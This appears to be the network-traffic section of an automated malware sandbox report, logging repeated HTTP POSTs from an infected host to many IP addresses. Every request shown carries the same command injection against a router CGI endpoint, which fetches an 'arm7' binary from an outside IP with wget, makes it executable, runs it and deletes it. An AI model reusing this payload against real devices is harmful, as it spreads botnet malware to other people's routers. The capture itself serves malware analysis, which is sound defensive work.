                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Thu, 21 Mar 2024 04:23:38 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Content-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2003192.168.2.1360072200.38.247.980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:38.931212902 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2004192.168.2.1347170213.176.109.23280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:38.971925974 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:39.132327080 CET400INHTTP/1.1 400 Bad Request
                                                        Server: WAF
                                                        Date: Thu, 21 Mar 2024 04:23:39 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Set-Cookie: waf_404=579d6216-4ead-405a-9634-d07a442b4f71; Max-Age=300; Path=/; HttpOnly
                                                        Cache-Control: no-cache, no-store
                                                        x-frame-options: sameorigin
                                                        Data Raw: 35 36 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3d 27 2f 68 6f 73 74 5f 6e 6f 74 5f 66 6f 75 6e 64 5f 65 72 72 6f 72 27 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 56<html><body><script>document.location='/host_not_found_error';</script></body></html>0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2005192.168.2.1340804213.251.171.10180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:38.972266912 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2006192.168.2.133419480.82.124.12380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:38.972393036 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:39.194360971 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2007192.168.2.135486886.107.79.13380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:38.990159988 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:39.221327066 CET1286INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 04:23:39 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Accept-Ranges: bytes
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Server: ClausWeb-nginx
                                                        cluster-host: server46.romania-webhosting.com
                                                        Data Raw: 65 66 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0d 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 0d 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 40 69 6d 70 6f 72 74 20 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 49 6e 63 6f 6e 73 6f 6c 61 74 61 27 3b 0d 0a 68 74 6d 6c 20 7b 0d 0a 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 7d 0d 0a 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 2f 2a 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 28 23 31 31 35 38 31 45 2c 20 23 30 34 31 36 30 37 29 2c 20 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 67 69 70 68 79 2e 63 6f 6d 2f 6d 65 64 69 61 2f 6f 45 49 39 75 42 59 53 7a 4c 70 42 4b 2f 67 69 70 68 79 2e 67 69 66 22 29 3b 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 49 6e 63 6f 6e 73 6f 6c 61 74 61 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 31 32 38 2c 20 32 35 35 2c 20 31 32 38 2c 20 30 2e 38 29 3b 0d 0a 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 31 65 78 20 23 33 33 66 66 33 33 2c 20 30 20 30 20 32 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 38 29 3b 0d 0a 7d 0d 0a 0d 0a 2e 6e 6f 69 73 65 20 7b 0d 0a 20 20 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 6e 6f 6e 65 3b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 2f 2a 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 6d 65 64 69 61 2e 67 69 70 68
                                                        Data Ascii: efa<!DOCTYPE html><html lang="en" ><head><meta charset="utf-8"> <title>Error 404 - Not found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css">...<link rel="stylesheet" href="./style.css">--><style>@import 'https://fonts.googleapis.com/css?family=Inconsolata';html { min-height: 100%;}body { box-sizing: border-box; height: 100%; background-color: #000000; /*background-image: radial-gradient(#11581E, #041607), url("https://media.giphy.com/media/oEI9uBYSzLpBK/giphy.gif");*/ background-repeat: no-repeat; background-size: cover; font-family: "Inconsolata", Helvetica, sans-serif; font-size: 1rem; color: rgba(128, 255, 128, 0.8); text-shadow: 0 0 1ex #33ff33, 0 0 2px rgba(255, 255, 255, 0.8);}.noise { pointer-events: none; position: absolute; width: 100%; height: 100%; /*background-image: url("https://media.giph
                                                        Mar 21, 2024 05:23:39.221369982 CET1286INData Raw: 79 2e 63 6f 6d 2f 6d 65 64 69 61 2f 6f 45 49 39 75 42 59 53 7a 4c 70 42 4b 2f 67 69 70 68 79 2e 67 69 66 22 29 3b 2a 2f 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0d 0a 20 20 62 61 63 6b 67
                                                        Data Ascii: y.com/media/oEI9uBYSzLpBK/giphy.gif");*/ background-repeat: no-repeat; background-size: cover; z-index: -1; opacity: 0.02;}.overlay { pointer-events: none; position: absolute; width: 100%; height: 100%; backgro
                                                        Mar 21, 2024 05:23:39.221431971 CET1286INData Raw: 3a 20 34 72 65 6d 3b 0d 0a 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 0d 0a 7d 0d 0a 0d 0a 2e 6f 75 74 70 75 74 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 31 32 38 2c 20 32 35 35 2c 20 31 32 38
                                                        Data Ascii: : 4rem; text-transform: uppercase;}.output { color: rgba(128, 255, 128, 0.8); text-shadow: 0 0 1px rgba(51, 255, 51, 0.4), 0 0 2px rgba(255, 255, 255, 0.8);}.output::before { content: "> ";}/*.input { color:
                                                        Mar 21, 2024 05:23:39.221443892 CET341INData Raw: 20 65 78 69 73 74 61 3c 62 72 3e 0d 0a e2 80 93 20 20 46 69 73 69 65 72 75 6c 20 73 6f 6c 69 63 69 74 61 74 20 6e 75 20 65 78 69 73 74 61 2f 61 20 66 6f 73 74 20 6d 75 74 61 74 2f 73 74 65 72 73 3c 62 72 3e 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 20 20 3c
                                                        Data Ascii: exista<br> Fisierul solicitat nu exista/a fost mutat/sters<br></p> <p class="output">Va rugam sa incercati sa reveniti la pagina de pornire : 127.0.0.1</p> <p class="output"><a href="https://www.clausweb.ro/intrebari-frecvente


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2008192.168.2.1339090178.33.182.24280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:39.137646914 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:40.012238026 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:40.171534061 CET400INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.20.1
                                                        Date: Thu, 21 Mar 2024 04:23:40 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 169
                                                        Connection: keep-alive
                                                        Location: https://www.globaltex.pl/cgi-bin/ViewLog.asp
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>
                                                        Mar 21, 2024 05:23:40.171581984 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.20.1
                                                        Date: Thu, 21 Mar 2024 04:23:40 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2009192.168.2.135699680.169.231.21680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:39.143678904 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:40.044234037 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:41.103347063 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
